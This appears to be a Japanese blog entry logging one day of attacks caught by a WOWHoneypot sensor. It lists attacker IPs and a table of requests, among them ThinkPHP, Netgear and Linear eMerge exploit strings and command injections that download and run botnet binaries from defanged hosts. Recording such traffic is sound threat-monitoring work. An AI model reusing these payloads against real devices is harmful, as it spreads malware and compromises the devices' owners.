23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(335日目)

2020/02/16(日)

トータルは455件でした。

ハンティングログは以下です。

111.255.162[.]17 wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws
36.236.140[.]165 wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT[.]niggacumyafacenet[.]xyz/jaws

www.virustotal.com
www.virustotal.com

85.33.36[.]165 wget hxxp[:]//switchnets[.]net/hoho.arm7

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
374 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
47 アクセス GET /
11 調査 GET /is_test
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 MVPower DVRなどの脆弱性を狙った通信 GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//jhasdjahsdjasfkdaskdfasBOT.niggacumyafacenet.xyz/jaws;sh+/tmp/jaws
2 D-Linkルータの調査 GET /HNAP1/
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
1 不正中継の調査 GET hxxp[:]//www.123cha.com/
1 調査 GET /script
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 不正中継の試み CONNECT www.ipip.net:443
1 不正中継の試み CONNECT www.baidu.com:443
1 不正中継の試み CONNECT ip.ws.126.net:443
1 不正中継の試み CONNECT cn.bing.com:443
1 phpunit脆弱性を狙った通信 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 Netgear ルータの脆弱性を狙った通信 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1
1 調査 GET /script
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 Linear eMerge E3の脆弱性を狙った通信 GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm